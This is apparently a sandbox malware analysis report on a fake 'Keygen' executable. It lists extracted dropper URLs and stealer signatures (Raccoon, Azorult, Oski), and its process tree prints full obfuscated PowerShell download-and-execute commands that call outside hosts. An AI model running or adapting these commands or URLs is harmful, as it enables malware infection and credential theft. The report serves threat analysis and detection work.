Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    97s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (31) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:36:11 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (465 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 52 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (31) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (31) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\39B6.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (31) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:804
      • C:\Users\Admin\AppData\Local\Temp\39B6.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1096
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\39B6.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1536
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
          • C:\Users\Public\ihk.exe
            "C:\Users\Public\ihk.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2668
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2812
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2324
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2324 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\581473928073546\\* & exit
                  8⤵
                    PID:2948
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2324
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2108
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2840
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3032
              • C:\Users\Public\ihk.exe
                "C:\Users\Public\ihk.exe"
                6⤵
                • Executes dropped EXE
                PID:2932
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\39B6.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1404
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1408
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\39B6.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1884
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:864
            • C:\Users\Public\lks.exe
              "C:\Users\Public\lks.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2612
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2380
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1048
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2700
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:608
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:2528
